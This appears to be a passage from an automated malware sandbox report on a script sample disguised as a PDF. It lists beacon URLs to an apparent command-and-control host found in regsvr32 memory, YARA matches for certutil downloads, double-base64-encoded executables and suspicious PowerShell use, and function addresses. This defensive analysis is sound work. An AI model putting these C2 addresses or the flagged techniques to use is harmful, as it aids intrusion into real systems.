Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190n |
Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190o |
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190p |
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190p(1 |
Source: regsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 |
Source: regsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190p2=Win10.0.17134x64-S_Regsvr32-v2.0.69F |
Source: regsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190p2=Win10.0.17134x64-S_Regsvr32-v2.0.69T |
Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190pLk |
Source: regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190q |
Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190qB |
Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190r |
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190s |
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190t |
Source: regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190u |
Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190uB |
Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190uC |
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190uN& |
Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190v |
Source: regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190v~ |
Source: regsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190wP |
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190x |
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190xt |
Source: regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190y |
Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190yC6 |
Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190z |
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190~N |
Source: x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse, type: SAMPLE | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889 |
Source: 00000000.00000002.562447318.0000027E99742000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.536073175.0000027E9967A000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.537403999.0000027E996A4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000004.00000002.445490921.0000022E1F0E2000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000021.00000003.657307580.0000000004F17000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.544459351.0000027E99732000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.534562796.0000027E99708000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000004.00000002.454006767.0000022E214AA000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000004.00000002.453909044.0000022E2144F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.534889418.0000027E99708000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.546366739.0000027E9B3E9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000004.00000002.445327272.0000022E1F060000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000002.562500921.0000027E9993A000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.535487473.0000027E9CCB6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.535487473.0000027E9CCB6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889 |
Source: 00000000.00000003.545823503.0000027E9CCB6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.545823503.0000027E9CCB6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889 |
Source: 00000000.00000003.559995374.0000027E99740000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.399402263.0000027E9B3C3000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000002.562513728.0000027E9993D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889 |
Source: 00000000.00000003.547005043.0000027E9B3CF000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889 |
Source: 00000000.00000003.427755304.0000027E9B3E1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.427755304.0000027E9B3E1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889 |
Source: 00000000.00000003.547727779.0000027E9B3E1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889 |
Source: 00000000.00000003.534727641.0000027E99677000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.559503063.0000027E996A5000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.551541440.0000027E9CD90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889 |
Source: 00000000.00000003.559948938.0000027EB69DF000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.559831762.0000027E996A5000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.539482612.0000027E99715000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000002.569744930.0000027E9B3E2000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889 |
Source: 00000000.00000003.534340935.0000027E9CCC6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000002.571001527.0000027E9CCB6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000002.571001527.0000027E9CCB6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889 |
Source: 00000000.00000003.546419483.0000027E9B3C6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889 |
Source: 00000000.00000003.549235895.0000027E99939000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.540876716.0000027E9972A000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000002.570828518.0000027E9CC69000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000004.00000002.453777516.0000022E213DE000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000002.571040593.0000027E9CCC6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.547572927.0000027E9993C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889 |
Source: 00000004.00000002.452214006.0000022E20FF2000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: Process Memory Space: wscript.exe PID: 7044, type: MEMORYSTR | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889 |
Source: Process Memory Space: powershell.exe PID: 304, type: MEMORYSTR | Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file |
Source: Process Memory Space: powershell.exe PID: 304, type: MEMORYSTR | Matched rule: PowerShell_Susp_Parameter_Combo_RID336F date = 2017-03-12 14:47:41, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, type = file, reference = https://goo.gl/uAic1X, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7 |
Source: Process Memory Space: powershell.exe PID: 4168, type: MEMORYSTR | Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file |
Source: Process Memory Space: powershell.exe PID: 4168, type: MEMORYSTR | Matched rule: PowerShell_Susp_Parameter_Combo_RID336F date = 2017-03-12 14:47:41, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, type = file, reference = https://goo.gl/uAic1X, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7 |
Source: Process Memory Space: regsvr32.exe PID: 2052, type: MEMORYSTR | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: C:\Users\user\Documents\20210825\PowerShell_transcript.910646.c593w7K1.20210825105827.txt, type: DROPPED | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: C:\ProgramData\temp\1673.tmp-PowerShell_transcript.910646.c593w7K1.20210825105827.txt, type: DROPPED | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DB72C0 | 13_2_00007FF983DB72C0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DB79B0 | 13_2_00007FF983DB79B0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DB7EB0 | 13_2_00007FF983DB7EB0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DA84D0 | 13_2_00007FF983DA84D0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983D98320 | 13_2_00007FF983D98320 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DD82F0 | 13_2_00007FF983DD82F0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DD22A4 | 13_2_00007FF983DD22A4 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DC6260 | 13_2_00007FF983DC6260 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DB1160 | 13_2_00007FF983DB1160 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DD1110 | 13_2_00007FF983DD1110 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983D9A860 | 13_2_00007FF983D9A860 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DC676C | 13_2_00007FF983DC676C |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DBF76C | 13_2_00007FF983DBF76C |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DB4750 | 13_2_00007FF983DB4750 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DCC714 | 13_2_00007FF983DCC714 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983D99710 | 13_2_00007FF983D99710 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DB66E0 | 13_2_00007FF983DB66E0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DD06F0 | 13_2_00007FF983DD06F0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DC85A0 | 13_2_00007FF983DC85A0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DD7570 | 13_2_00007FF983DD7570 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DBF504 | 13_2_00007FF983DBF504 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DD84FC | 13_2_00007FF983DD84FC |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DDA4EC | 13_2_00007FF983DDA4EC |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DC8CB0 | 13_2_00007FF983DC8CB0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983D9AB80 | 13_2_00007FF983D9AB80 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DD2B3C | 13_2_00007FF983DD2B3C |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DA0B30 | 13_2_00007FF983DA0B30 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983D989D0 | 13_2_00007FF983D989D0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DB5990 | 13_2_00007FF983DB5990 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DA7940 | 13_2_00007FF983DA7940 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983D96950 | 13_2_00007FF983D96950 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DD48EC | 13_2_00007FF983DD48EC |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983D99080 | 13_2_00007FF983D99080 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983D95050 | 13_2_00007FF983D95050 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DA7020 | 13_2_00007FF983DA7020 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983D99FE0 | 13_2_00007FF983D99FE0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DAAF60 | 13_2_00007FF983DAAF60 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DB4EF0 | 13_2_00007FF983DB4EF0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983D9CEA0 | 13_2_00007FF983D9CEA0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DCCEAC | 13_2_00007FF983DCCEAC |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DDBE4C | 13_2_00007FF983DDBE4C |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DC8DD0 | 13_2_00007FF983DC8DD0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DD6D08 | 13_2_00007FF983DD6D08 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DB7CFE | 13_2_00007FF983DB7CFE |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983D98D10 | 13_2_00007FF983D98D10 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D272C0 | 19_2_00007FF983D272C0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D279B0 | 19_2_00007FF983D279B0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D27EB0 | 19_2_00007FF983D27EB0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D184D0 | 19_2_00007FF983D184D0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D08320 | 19_2_00007FF983D08320 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D482F0 | 19_2_00007FF983D482F0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D422A4 | 19_2_00007FF983D422A4 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D36260 | 19_2_00007FF983D36260 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D21160 | 19_2_00007FF983D21160 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D41110 | 19_2_00007FF983D41110 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D0A860 | 19_2_00007FF983D0A860 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D3676C | 19_2_00007FF983D3676C |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D2F76C | 19_2_00007FF983D2F76C |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D24750 | 19_2_00007FF983D24750 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D09710 | 19_2_00007FF983D09710 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D3C714 | 19_2_00007FF983D3C714 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D266E0 | 19_2_00007FF983D266E0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D406F0 | 19_2_00007FF983D406F0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D385A0 | 19_2_00007FF983D385A0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D47570 | 19_2_00007FF983D47570 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D484FC | 19_2_00007FF983D484FC |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D2F504 | 19_2_00007FF983D2F504 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D4A4EC | 19_2_00007FF983D4A4EC |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D38CB0 | 19_2_00007FF983D38CB0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D0AB80 | 19_2_00007FF983D0AB80 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D42B3C | 19_2_00007FF983D42B3C |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D10B30 | 19_2_00007FF983D10B30 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D089D0 | 19_2_00007FF983D089D0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D25990 | 19_2_00007FF983D25990 |
